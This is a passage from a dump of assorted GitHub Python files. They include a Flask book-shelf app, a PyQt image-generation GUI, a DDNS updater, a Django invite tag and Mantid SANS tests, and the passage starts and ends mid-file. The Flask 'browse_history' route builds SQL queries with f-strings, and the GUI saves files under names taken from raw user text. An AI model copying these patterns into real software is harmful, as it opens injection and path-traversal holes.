request.form.get(\"search_words\")\n if not keywords:\n return render_template(\"index.html\")\n else:\n return search()\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/my_books\")\ndef my_books():\n if session.get('id') == True:\n favourites = db.execute(\"\"\"SELECT * FROM favourites\n JOIN items ON items.id = favourites.item_id\n WHERE user_id = ?\"\"\",\n session['id'])\n\n view_history = db.execute(\"\"\"SELECT * FROM items\n LEFT JOIN view_history ON items.id = view_history.item_id\n WHERE user_id = ?\n GROUP BY item_id\n ORDER BY view_history.id DESC LIMIT 20;\"\"\",\n session['id'])\n\n if request.args.get('filter_query'):\n query = json.loads(request.args.get('filter_query'))\n else:\n query = None\n\n items = {\n 'favourites': favourites,\n 'shelves': get_user_items(query),\n 'view hisrory': view_history\n }\n\n filter_attributes = {\n 'categories': arrange_attribute(get_user_items(query), 'category'),\n 'languages': arrange_attribute(get_user_items(query), 'language'),\n 'page counts': arrange_attribute(get_user_items(query), 'page_count'),\n 'release date': [int(x[:4]) for x in arrange_attribute(get_user_items(query), 'release_date') if x[0].isdigit()]\n }\n\n return render_template(\"My collection.html\", items=items, filter_attributes=filter_attributes)\n else:\n return 'None'\n\n\n@app.route(\"/append_permession\")\ndef append_permession():\n append_permession = request.args.get('order')\n if append_permession == 'y':\n session['temp_data'] = update_visitor_data()\n append_temp_to_usr_data(session[\"id\"])\n session['temp_data']['collection'].clear()\n session['temp_data']['favourites'].clear()\n return 'append_successful'\n else:\n session['temp_data']['collection'].clear()\n session['temp_data']['favourites'].clear()\n return 'discard'\n\n\n@app.route(\"/get_my_books_count\")\ndef get_my_books_count():\n if session.get('id'):\n items = db.execute(\"\"\"SELECT * FROM collection\n LEFT OUTER JOIN favourites ON collection.item_id = favourites.item_id\n WHERE collection.user_id = ?\"\"\", session['id'])\n else:\n session['temp_data'] = update_visitor_data()\n items = set(list(session['temp_data']['collection'].keys()) + session['temp_data']['favourites'])\n\n return str(len(items))\n\n\n@app.route(\"/browse_history\")\ndef browse_history():\n if session.get('id'):\n sql_query = f\"\"\"SELECT * FROM items\n LEFT JOIN view_history ON items.id = view_history.item_id\n WHERE user_id = {session['id']}\n GROUP BY item_id\n ORDER BY view_history.id DESC LIMIT 20;\"\"\"\n else:\n sql_query = f\"\"\"SELECT * FROM items\n WHERE id IN ({(', '.join(update_visitor_data()['view_history']))})\n GROUP BY id LIMIT 20;\"\"\"\n\n browse_history = []\n crsr.execute(sql_query)\n items = crsr.fetchall()\n columnNames = [column[0] for column in crsr.description]\n\n for record in items:\n browse_history.append(dict(zip(columnNames, record)))\n\n return {'Browse history': browse_history}\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n filters = {}\n if request.method == \"POST\":\n keywords = request.form.get(\"search_words\")\n search_result = query_search(keywords)\n return render_template(\"search.html\", results=search_result, page=1, keywords=keywords, str=str, post=True)\n else:\n filters = {\n 'relevance': request.args.get(\"relevance\"),\n 'search_by': request.args.get(\"search-by\"),\n 'readability': request.args.get(\"read-availability\"),\n 'print_type': request.args.get(\"print_typ\"),\n 'lang': request.args.get(\"lang\"),\n 'keywords': request.args.get(\"keywords\"),\n 'page': request.args.get(\"page\") if request.args.get(\"page\") else 1\n }\n\n search_result = query_search(filters['keywords'], **filters)\n print(f\"\\n\\n\\n{filters}\\n\\n\\n\")\n # return render_template(\"search.html\", results = search_result, page = filters['page'], keywords=filters['keywords'], str=str, post=True)\n return render_template(\"search.html\", results=search_result, filters=filters, str=str, post=True)\n\n\n@app.route(\"/view_item\", methods=[\"GET\", \"POST\"])\ndef view_item():\n item_id = request.args.get('volume_id')\n add_item(item_id)\n if session.get('id') == True:\n db.execute(\"INSERT INTO view_history (user_id, item_id) VALUES(?, ?)\",\n session['id'], item_id)\n return 'None'\n else:\n update_view_history(item_id)\n session['temp_data'] = update_visitor_data()\n return str(session['temp_data'])\n\n\n@app.route(\"/get_user_items\")\ndef get_user_items(query):\n if query:\n query = json.loads(query)\n collection_items = {'To read': fill_shelf(1, query), 'Have read': fill_shelf(2, query), 'Reading': fill_shelf(3, query)}\n\n return collection_items\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n # Forget any user_id\n if session.get('id'):\n session.pop('id')\n user_email = request.form['user-email'].lower()\n password = request.form['user-password']\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", user_email)\n if not user_email or not password:\n return 'Both fields are required'\n elif len(rows) == 0 or not check_password_hash(rows[0][\"password\"], password):\n return \"Invalid Email or Password\"\n else:\n session[\"id\"] = rows[0][\"id\"]\n session[\"name\"] = rows[0][\"f_name\"]\n if len(set(list(session['temp_data']['collection'].keys()) + session['temp_data']['favourites'])) > 0:\n return 'append_permession'\n return 'login_successful'\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n # Forget any user_id\n session.pop('id')\n return redirect('/')\n\n\n@app.route(\"/sign_up\", methods=[\"POST\"])\ndef sign_up():\n \"\"\"Register user\"\"\"\n if request.method == \"POST\":\n form_inputs = {'first_name': None, 'last_name': None, 'email': None, 'b_date': None,\n 'gender': None, 'password': None, 're_password': None}\n\n form_inputs['first_name'] = request.form.get(\"first_name\")\n form_inputs['last_name'] = request.form.get(\"last_name\")\n form_inputs['email'] = request.form.get(\"email\").lower()\n form_inputs['b_date'] = request.form.get(\"b_date\")\n form_inputs['gender'] = request.form.get(\"gender\")\n form_inputs['password'] = request.form.get(\"password\")\n form_inputs['re_password'] = request.form.get(\"re_password\")\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", form_inputs['email'])\n\n for key, value in form_inputs.items():\n if value == None or not value:\n return form_inputs\n\n if form_inputs['password'] != form_inputs['re_password']:\n return (\"Password and confirm Password don't match\")\n elif len(rows) == 1:\n return(\"This Email is already registered\")\n else:\n # try:\n db.execute(\"INSERT INTO users (f_name, l_name, b_date, gender, email, password) VALUES(?, ?, ?, ?, ?, ?)\",\n form_inputs['first_name'], form_inputs['last_name'], form_inputs['b_date'],\n form_inputs['gender'], form_inputs['email'], generate_password_hash(form_inputs['password'], method='pbkdf2:sha256',\n salt_length=8))\n\n return redirect(\"/\")\n\n else:\n return render_template(\"register.html\")\n\n\n@app.route(\"/update_shelf\")\ndef update_shelf():\n list_code = request.args.get('shelf')\n print(f'\\n\\n\\n back shelf is {list_code}\\n\\n\\n')\n item_id = request.args.get('volume_id')\n\n if session.get('id') == True:\n # check if item already exists in user collection\n row_collection = db.execute(\"SELECT * FROM collection WHERE user_id = ? AND item_id = ?\",\n session['id'], item_id)\n\n # Add, delete or update item shelf based on list_code\n if len(row_collection) == 0:\n db.execute(\"INSERT INTO collection (user_id, item_id, list_id) VALUES(?, ?, ?)\",\n session['id'], item_id, list_code)\n return '1'\n elif row_collection[0]['list_id'] == int(list_code):\n db.execute(\"DELETE FROM collection WHERE item_id = ? AND user_id = ?\", item_id, session['id'])\n return '0'\n\n else:\n db.execute(\"UPDATE collection SET list_id = ? WHERE item_id = ? AND user_id = ?\",\n list_code, item_id, session['id'])\n # return f\"{row_collection[0]}\"\n return \"2\"\n else:\n shelf = update_visitor_shelf(item_id, list_code)\n session['temp_data'] = update_visitor_data()\n return shelf\n\n\n@app.route(\"/get_shelf\")\ndef get_shelf():\n item_id = request.args.get('volume_id')\n\n if session.get('id') == True:\n user_id = session['id']\n\n item = db.execute(\"SELECT * FROM collection WHERE item_id = ? AND user_id = ?\", item_id, user_id)\n\n if len(item) != 0:\n return str(item[0]['list_id'])\n else:\n return 'None'\n else:\n session['temp_data'] = update_visitor_data()\n if item_id in session['temp_data']['collection'].keys():\n return session['temp_data']['collection'][item_id]\n else:\n return 'None'\n\n\n@app.route(\"/update_favourits\")\ndef update_favourites():\n item_id = request.args.get('volume_id')\n\n if session.get('id') == True:\n # check for item in user favourites\n item = db.execute(\"SELECT * FROM favourits WHERE user_id = ? AND item_id = ?\",\n session['id'], item_id)\n # Add item to user favourites if it doesn't exist else remove it\n if len(item) == 0:\n db.execute(\"INSERT INTO favourits (user_id, item_id) VALUES(?, ?)\",\n session['id'], request.args.get('volume_id'))\n return '1'\n else:\n db.execute(\"DELETE FROM favourits WHERE item_id = ? AND user_id = ?\",\n request.args.get('volume_id'), session['id'])\n return '0'\n else:\n fav_bool = update_visitor_favourites(item_id)\n session['temp_data'] = update_visitor_data()\n print(f\"\\n\\n\\n{fav_bool}\\n\\n\\n\")\n return str(fav_bool)\n\n\n@app.route(\"/check_if_fav\")\ndef check_if_fav():\n item_id = request.args.get('volume_id')\n if session.get('id') == True:\n item = db.execute(\"SELECT * FROM favourites WHERE user_id = ? AND item_id = ?\",\n session['id'], item_id)\n # Add item to user favourites if it doesn't exist else remove it\n if len(item) == 0:\n return '0'\n else:\n return '1'\n else:\n if item_id in session['temp_data']['favourites']:\n print(f\"\\n\\n\\n{session['temp_data']['favourites']}\\n\\n\\n\")\n return '1'\n else:\n return '0'\n\n\n@app.route(\"/return_chart_data\")\ndef return_chart_data():\n item_id = request.args.get('item_id')\n\n item_shelves = {\n 'To read': 0,\n 'Have read': 0,\n 'Reading': 0\n }\n\n data = db.execute(\"\"\"SELECT list_id, COUNT(*) as counts FROM collection\n JOIN users ON users.id = collection.user_id\n WHERE item_id = ?\n GROUP BY list_id;\"\"\", item_id)\n\n for val in data:\n print(f\"\"\"\\n\\n{val}\\n\\n\"\"\")\n if val['list_id'] == 1:\n item_shelves['To read'] += int(val['counts'])\n elif val['list_id'] == 2:\n item_shelves['Have read'] += int(val['counts'])\n elif val['list_id'] == 3:\n item_shelves['Reading'] += int(val['counts'])\n\n return item_shelves","repo_name":"Khaled-Sherif/CS50-Final-Project-Bookify","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31552705166","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QListWidgetItem, QMainWindow, QListView, QVBoxLayout, QLCDNumber, QLineEdit, QGridLayout, QWidget, QAbstractButton, QPushButton, QLabel, QListWidget,QHBoxLayout, QComboBox, QTextEdit, QSlider , QGroupBox\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QPainterPath, QImage, QPixmap, QIcon\nfrom PyQt5.QtCore import QSize, Qt, QPoint, QRect, QAbstractListModel, QModelIndex, QUrl, QByteArray\nfrom PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest\nimport sketch\nimport sys\nimport requests\nimport json\nfrom PIL import Image\nfrom io import BytesIO\nimport os, io\nimport config\nimport replicate\nimport shutil\n\nos.environ[\"REPLICATE_API_TOKEN\"] = config.replicate_api_key\nAPI_URL = \"https://api-inference.huggingface.co/models/SG161222/Realistic_Vision_V1.4\"\nheaders = {\"Authorization\": f\"Bearer {config.huggingface_api_key}\"}\nos.makedirs('chatbot_responses', exist_ok=True)\nos.makedirs('bookmarks', exist_ok=True)\nos.makedirs('controlnet_responses', exist_ok=True)\n\nclass ChatBox(QGroupBox):\n def __init__(self, bookmarks):\n super().__init__(\"Inspiration\")\n self.chatMessageSend = QPushButton(\"Generate\")\n self.chatMessage = QLineEdit(\"\")\n self.chatMessage.setPlaceholderText(\"Describe here...\")\n self.bookmarks = bookmarks\n self.recentReponseImageDisplay = QLabel(\"\")\n self.recentReponseImageDisplay.setFixedSize(280, 280)\n self.recentReponseImageDisplay.setStyleSheet(\"QLabel { background-color: white; border: 1px solid #444444; }\")\n\n \n # recentReponseImageDisplayLayout = QHBoxLayout(self.recentReponseImageDisplay)\n # self.recentReponseImageDisplay.setLayout(recentReponseImageDisplayLayout)\n \n chatBoxLayout = QGridLayout(self)\n chatBoxLayout.addWidget(self.chatMessage, 1, 0, 1, 3)\n chatBoxLayout.addWidget(self.chatMessageSend, 1, 3)\n chatBoxLayout.addWidget(self.recentReponseImageDisplay, 0, 0, 1, 4)\n \n self.chatMessageSend.clicked.connect(self.add_group_box)\n \n list_widget = QListWidget()\n chatBoxLayout.addWidget(list_widget, 2, 0, 1, 4)\n\n self.list_widget = list_widget\n self.list_widget.setMinimumWidth(280)\n \n \n def generate_chatbot_response(self, message):\n clothing_description = message\n data = self.query(\"a full body, uncropped, head to toe photo of a single model wearing a \"+ clothing_description + \", facing the camera, simple background\")\n stream = io.BytesIO(data.content)\n img = Image.open(stream)\n img.save('./chatbot_responses/' + message + \".jpg\")\n return './chatbot_responses/' + message + \".jpg\"\n \n def query(self,payload):\n data = json.dumps(payload)\n response = requests.request(\"POST\", API_URL, headers=headers, data=data)\n return response\n \n def add_group_box(self):\n message = self.chatMessage.text()\n if message == \"\":\n return\n self.chatMessage.clear()\n response = self.generate_chatbot_response(message)\n #self.load_image(self.recentReponseImageDisplay, response, desired_width=280, desired_height=280)\n \n image = QImage(280,280, QImage.Format_RGB32)\n image.load(response)\n pixmap = QPixmap.fromImage(image)\n pixmap = pixmap.scaled(280, 280, Qt.AspectRatioMode.KeepAspectRatio)\n self.recentReponseImageDisplay.setPixmap(pixmap)\n \n # Create a new QGroupBox\n group_box = QGroupBox(self)\n group_box.setTitle(message)\n\n # Create a QHBoxLayout for the group box\n layout = QHBoxLayout(group_box)\n group_box.setLayout(layout)\n\n # Load and display the image\n self.load_image(group_box, response, desired_width=100, desired_height=100)\n\n # Create a QPushButton\n bookMarkSend = QPushButton(\"Save\")\n bookMarkSend.setFixedSize(100, 30)\n layout.addWidget(bookMarkSend)\n\n # Connect the button's clicked signal to the slot function\n bookMarkSend.clicked.connect(self.bookmark_clicked(message))\n \n # Create a QListWidgetItem and set the QGroupBox as its widget\n item = QListWidgetItem(self.list_widget)\n item.setSizeHint(group_box.sizeHint())\n self.list_widget.addItem(item)\n self.list_widget.setItemWidget(item, group_box)\n\n def load_image(self, group_box, image_path, desired_width, desired_height):\n # Create a QLabel widget\n label = QLabel(group_box)\n\n # Create a QPixmap object with the image\n pixmap = QPixmap(image_path)\n\n # Scale the image while preserving aspect ratio\n pixmap = pixmap.scaled(desired_width, desired_height, Qt.AspectRatioMode.KeepAspectRatio)\n\n # Set the image to the QLabel\n label.setPixmap(pixmap)\n\n # Add the QLabel to the QHBoxLayout\n layout = group_box.layout()\n layout.addWidget(label)\n\n def bookmark_clicked(self, fname):\n\n def add_to_bookmarks():\n # add to folder bookmarks\n shutil.copyfile('./chatbot_responses/' + fname + \".jpg\", './bookmarks/' + fname + \".jpg\")\n self.bookmarks.add_group_box(fname)\n return add_to_bookmarks","repo_name":"mwaliman/FashionCycle","sub_path":"chat_box.py","file_name":"chat_box.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"14300045849","text":"import json\nfrom random import shuffle\nfrom item import Item\nfrom typing import List\n\n\n# Return all items from JSON file as a set\ndef getItems(filePath=\"items.json\"):\n f = open(filePath, \"r\")\n rawList = json.load(f)\n itemSet = {Item(item) for item in rawList}\n f.close()\n return itemSet\n\n# Return a list of items based on rarity\n\n\ndef getItemsWithPrices(quantityGenerated: List[int]) -> List[Item]:\n items = getItems()\n rarities = [\"common\", \"uncommon\", \"rare\", \"veryrare\", \"legendary\"]\n output: List[Item] = []\n for i in range(len(quantityGenerated)):\n currentRarity = rarities[i]\n amountToGenerate = quantityGenerated[i]\n itemsAtCurrentRarity = [x for x in items if x.rarity == currentRarity]\n shuffle(itemsAtCurrentRarity)\n for j in range(amountToGenerate):\n item = itemsAtCurrentRarity[j]\n item.setPrice()\n output.append(item)\n\n return output\n\n\n# Saves Items to JSON Files\ndef writeItemsToJson(items=getItems()):\n f = open(\"items.json\", \"w\")\n # Convert Item object instances to Json Strings\n itemsDict = [item.toJson() for item in items]\n json.dump(itemsDict, f, indent=4)\n","repo_name":"aubenick/DnD-Shop-Script","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"1717570756","text":"# -*- coding: utf-8 -*-\nfrom DNS import dnspod, dynv6\nimport config_func\nfrom time import sleep\nfrom command import ipv6, reset\nimport os\n\n\ndef start(subdomain, time):\n try:\n file = open('conf/ddns.conf', 'r')\n file.close()\n except FileNotFoundError:\n try:\n os.mkdir('conf')\n except FileExistsError:\n pass\n finally:\n os.system('echo # ddns-conf>conf/ddns.conf')\n reset.reset()\n\n config = config_func.read_config('conf/ddns.conf')\n for key, value in config.items():\n if value == '':\n print(\"请完成配置 \"+key)\n return 0\n\n value = ipv6.get_global_ipv6()\n recordid = 0\n if config['dns'] == 'dnspod':\n for record in dnspod.dnspod_get_record_list_noprint(config['domain'], config['secretid'], config['secretkey']).RecordList:\n if record.Name == subdomain and record.Type == 'AAAA':\n print('已存在该记录')\n recordid = record.RecordId\n dnspod.dnspod_change_record(config['domain'], config['secretid'], config['secretkey'], recordid, value, subdomain)\n break\n else:\n continue\n if recordid == 0:\n print('不存在该记录,创建新记录')\n recordid = dnspod.dnspod_add_record(config['domain'], config['secretid'], config['secretkey'], value, subdomain).RecordId\n elif config['dns'] == 'dynv6':\n dynv6.add_record(subdomain, config['api_token_dynv6'], config['domain'], value)\n\n\n while 1:\n value_tmp = ipv6.get_global_ipv6()\n if value != value_tmp:\n print('IPV6已改变')\n value = value_tmp\n if config['dns'] == 'dnspod':\n dnspod.dnspod_change_record(config['domain'], config['secretid'], config['secretkey'], recordid, value, subdomain)\n elif config['dns'] == 'dynv6':\n dynv6.add_record(subdomain, config['api_token_dynv6'], config['domain'], value)\n else:\n print(\"未改变\")\n sleep(int(time))\n","repo_name":"QLYZWD/ddns-q","sub_path":"command/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"3280616865","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n self.current_sum = 0\n self.bstToGstUtil(root)\n return root\n\n def bstToGstUtil(self, root):\n if not root: return\n self.bstToGstUtil(root.right)\n self.current_sum += root.val\n root.val = self.current_sum\n self.bstToGstUtil(root.left)\n","repo_name":"pqnguyen/CompetitiveProgramming","sub_path":"platforms/leetcode/BinarySearchTreetoGreaterSumTree.py","file_name":"BinarySearchTreetoGreaterSumTree.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12192040623","text":"#task7-4\nwhile True:\n pizza_topping = input(\"Please enter pizza topping or 'quit' to exit: \")\n if pizza_topping.lower() == 'quit':\n break\n else:\n print(f\"You have added '{pizza_topping}' topping.\")\n\n#task7-5\nprint(\"\\n\")\nwhile True:\n age = int(input(\"Enter age for ticket price: \"))\n if age <=3:\n print(\"Ticket is free.\")\n elif age < 12:\n print(\"Ticket is 10$\")\n else:\n print(\"Ticket is 15$\")","repo_name":"Gimkk/Python","sub_path":"crash_course/chapter_7/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35032655948","text":"from django.urls import path\nfrom .views import *\n\n\n\nurlpatterns=[\n path('signin/',signin,name='signin'),\n path('signup/',signup,name='signup'),\n path('seller_index/',seller_index,name='seller_index'),\n path('form/',form,name='form'),\n path('table/',table,name='table'),\n path('seller_otp/',seller_otp,name='seller_otp'),\n path('',seller_index,name='seller_index'),\n path('seller_edit_profile/',seller_edit_profile,name='seller_edit_profile'),\n path('seller_logout/',seller_logout,name='seller_logout'),\n path('my_product/',my_product,name='my_product'),\n path('add_product/',add_product,name='add_product'),\n path('edit_product/',edit_product,name='edit_product'),\n path('delete_product/',delete_product,name='delete_product'),\n path('my_order/',my_order,name='my_order'),\n path('change_status/',change_status,name='change_status')\n]","repo_name":"Papuku/papu_eccommerce","sub_path":"seller/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"42004253626","text":"from django import template\nfrom django.template.loader import render_to_string\n\nfrom invite.models import Invitation, make_token\nfrom invite.forms import InviteForm\n\nregister = template.Library()\n\nclass InviteFormNode(template.Node):\n def __init__(self, object_expr=None):\n self.object_expr = object_expr\n\n def get_target(self, context):\n return self.object_expr.resolve(context) if self.object_expr else None\n\n def render(self, context):\n user = context[\"request\"].user\n content_object = self.get_target(context)\n invite = Invitation(user=user, content_object=content_object) if content_object else Invitation(user=user)\n form = InviteForm(instance=invite)\n context.push() #move the context stack forward so our variable names don't conflict\n value = render_to_string(\"invite/invite_form.html\", {\"form\":form}, context)\n context.pop()\n return value\n\n@register.tag\ndef get_invite_form(parser, token):\n \"\"\"\n Get a form to send an invite to that is optionally related to an object\n\n Syntax::\n {% get_invite_form %}\n or\n {% get_invite_form for [object] %}\n \"\"\"\n tokens = token.split_contents()\n if len(tokens) > 3:\n raise template.TemplateSyntaxError(\"Invalid Syntax\")\n if len(tokens) == 1:\n return InviteFormNode()\n if tokens[1] != \"for\":\n raise template.TemplateSyntaxError(\"Second argument in %r tag must be 'for'\" % tokens[0])\n return InviteFormNode(parser.compile_filter(tokens[2]))\n","repo_name":"allianceforclimateprotection/repowerathome","sub_path":"invite/templatetags/invites.py","file_name":"invites.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"32138425592","text":"import stresstesting\nfrom mantid.simpleapi import * \nfrom mantid.api import Workspace\nfrom ISISCommandInterface import *\nimport numpy\nimport unittest\n\n## export PYTHONPATH=/apps/workspace/mantid_debug/bin/:/apps/mantid/systemtests/StressTestFramework/:/apps/mantid/mantid/Code/Mantid/scripts/SANS/:/apps/mantid/mantid/Code/Mantid/scripts/reduction\n\n\n\"\"\"\nAllowing the reduction to use already loaded workspace will make it easier to \ndeal with event mode and producing new workspaces for the reduction of data.\nTill 06/2013 the reload option was available, but not implemented. \n\nIn order to protect the system, it is suggested the following integration tests\nto ensure that allowing workspaces as input to the reduction will not disturb the \nreduction itself, and it is safe.\n\nLOQReductionShouldAcceptLoadedWorkspace ensure some requirements for the reloading. \nSANS2DReductionShouldAcceptLoadedWorkspace and SANS2DReductionShouldAcceptLoadedWorkspaceRawFile\napply the same requirements for SANS2D instruments. \n\n\nLOQReductionShouldAcceptLoadedWorkspaceStressTest, SANS2DReductionShouldAcceptLoadedWorkspaceStressTest\nand SANS2DReductionShouldAcceptLoadedWorkspace are wrappers to make unittest.TestCase to fit the stresstesting\nframework. \n\nThe other tests are here to ensure the results of providing directly workspaces will be the same that loading\nfrom files. \n\n\"\"\"\n\nclass LOQReductionShouldAcceptLoadedWorkspace(unittest.TestCase):\n \"\"\"\n The following tests is to ensure that the reload obeys the following requirement: \n * If reload is True the real data will be always reloaded from the file\n * If reload is False, it will be used, if it pass the following tests: \n * The instrument components have not been moved\n \"\"\"\n def setUp(self):\n self.load_run = '54431.raw'\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n MaskFile(\"MASK.094AA\")\n self.control_name = '54431main_1D_2.2_10.0'\n self.inst_comp = 'main-detector-bank'\n\n def tearDown(self):\n mtd.clear()\n\n def test_accept_loaded_workspace_only_if_reload_false(self):\n my_workspace = Load(self.load_run)\n #set the value for my_workspace to ensure it is the one used\n aux = my_workspace.dataY(0)\n aux[10]=5\n my_workspace.setY(0,aux)\n # ask to use the loaded workspace\n AssignSample(my_workspace,reload=False)\n \n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n \n self.assertTrue(ws_name, my_workspace.name())\n \n self.assertTrue(my_workspace.dataY(0)[10],5)\n # ensure that it is able to execute the reduction\n Reduce()\n self.assertTrue(self.control_name in mtd)\n\n\n def test_accept_loaded_workspace_but_reload_the_data_file_if_reload_true(self):\n my_workspace = Load(self.load_run)\n #set the value for my_workspace to ensure it is the one used\n aux = my_workspace.dataY(0)\n aux[10]=5\n my_workspace.setY(0,aux)\n # ask to use the loaded workspace\n AssignSample(my_workspace,reload=True)\n \n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n # it is different, because, it will compose the name using its rule, \n # wich, for sure, will be different of my_workspace.\n self.assertFalse(ws_name==my_workspace.name())\n self.assertFalse(mtd[ws_name].dataY(0)[10]==5)\n # it is not necessary to ensure the Reduce occurs\n\n def test_should_not_accept_loaded_workspace_if_moved(self):\n my_workspace = Load(self.load_run)\n MoveInstrumentComponent(my_workspace,self.inst_comp,X=2,Y=1,Z=0)\n ## attempt to use a workspace that has been moved\n self.assertRaises(RuntimeError, AssignSample, my_workspace, False)\n\n\n def test_should_not_accept_loaded_workspace_if_moved_2(self):\n # assign sample loads and move the workspace to the defined center\n AssignSample(self.load_run)\n\n # this makes it load this worksapce and generates an output workspace\n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n # the workspace is renamed, so it seems another workspace\n my_workspace = RenameWorkspace(ws_name)\n ## trying to assing it again to AssingSample must fail\n self.assertRaises(RuntimeError, AssignSample, my_workspace, False)\n\nclass SANS2DReductionShouldAcceptLoadedWorkspace(LOQReductionShouldAcceptLoadedWorkspace):\n def setUp(self):\n self.load_run = '2500.nxs'\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile(\"MASKSANS2D_094i_RKH.txt\")\n self.control_name = '2500front_1D_4.6_12.85'\n self.inst_comp = 'rear-detector'\n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceRawFile(SANS2DReductionShouldAcceptLoadedWorkspace):\n def setUp(self):\n SANS2DReductionShouldAcceptLoadedWorkspace.setUp(self)\n self.load_run = '5547.raw'\n self.control_name = '5547front_1D_4.6_12.85'\n\nclass LOQReductionShouldAcceptLoadedWorkspaceStressTest(stresstesting.MantidStressTest):\n cl = LOQReductionShouldAcceptLoadedWorkspace\n def runTest(self):\n self._success = False\n # Custom code to create and run this single test suite\n suite = unittest.TestSuite()\n suite.addTest( unittest.makeSuite(self.cl, \"test\"))\n runner = unittest.TextTestRunner()\n # Run using either runner\n res = runner.run(suite)\n if res.wasSuccessful():\n self._success = True\n\n def validate(self):\n return self._success \n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceStressTest(LOQReductionShouldAcceptLoadedWorkspaceStressTest):\n cl = SANS2DReductionShouldAcceptLoadedWorkspace\n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceStressTest2(LOQReductionShouldAcceptLoadedWorkspaceStressTest):\n cl = SANS2DReductionShouldAcceptLoadedWorkspaceRawFile\n\n\nclass LOQTransFitWorkspace2DWithLoadedWorkspace(stresstesting.MantidStressTest):\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n MaskFile('MASK.094AA')\n Gravity(False)\n Set2D()\n Detector(\"main-detector-bank\")\n Sample = LoadRaw('54431.raw')\n AssignSample(Sample,False)\n Can = LoadRaw('54432.raw')\n AssignCan(Can,False)\n LimitsWav(3,4, 0.2, 'LIN')\n TransFit('LOG',3.0,8.0)\n Sample_Trans = LoadRaw('54435.raw')\n Sample_Direct = LoadRaw('54433.raw')\n TransmissionSample(Sample_Trans, Sample_Direct, False)\n Can_Trans = LoadRaw('54434.raw')\n Can_Direct = LoadRaw('54433.raw')\n TransmissionCan(Can_Trans, Can_Direct, False)\n\n #run the reduction\n WavRangeReduction(3, 4, False, '_suff')\n\n def validate(self):\n self.disableChecking.append('SpectraMap')\n #when comparing LOQ files you seem to need the following\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n return '54431main_2D_3.0_4.0_suff','LOQTransFitWorkspace2D.nxs'\n\nclass LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_1(stresstesting.MantidStressTest):\n \"\"\" It will repeat the test done at LOQCentreNoGrav but using \n loaded workspaces\n \"\"\"\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n\n Set1D()\n Detector(\"rear-detector\")\n MaskFile('MASK.094AA')\n Gravity(False)\n Sample = LoadRaw('54431.raw')\n Trans_Sample = LoadRaw('54435.raw')\n Trans_Direct = LoadRaw('54433.raw')\n Can = LoadRaw('54432.raw')\n CanTrans_Sample = LoadRaw('54434.raw')\n CanTrans_Direct = LoadRaw('54433.raw')\n \n AssignSample(Sample, False)\n TransmissionSample(Trans_Sample, Trans_Direct, False)\n AssignCan(Can, False)\n TransmissionCan(CanTrans_Sample, CanTrans_Direct, False)\n \n FindBeamCentre(60,200, 9)\n \n WavRangeReduction(3, 9, DefaultTrans)\n \n def validate(self):\n return '54431main_1D_3.0_9.0','LOQCentreNoGravSearchCentreFixed.nxs'\n\nclass LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_2(stresstesting.MantidStressTest):\n \"\"\"Before ticket #8461 test LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_1 used\n to produce a workspace that matches LOQCentreNoGrav.nxs. This test is created to ensure\n that if we put the same centre that was produced before, we finish in the same result\n for the reduction\"\"\"\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n\n Set1D()\n Detector(\"rear-detector\")\n MaskFile('MASK.094AA')\n Gravity(False)\n Sample = LoadRaw('54431.raw')\n Trans_Sample = LoadRaw('54435.raw')\n Trans_Direct = LoadRaw('54433.raw')\n Can = LoadRaw('54432.raw')\n CanTrans_Sample = LoadRaw('54434.raw')\n CanTrans_Direct = LoadRaw('54433.raw')\n \n SetCentre(324.765, 327.670)\n\n AssignSample(Sample, False)\n 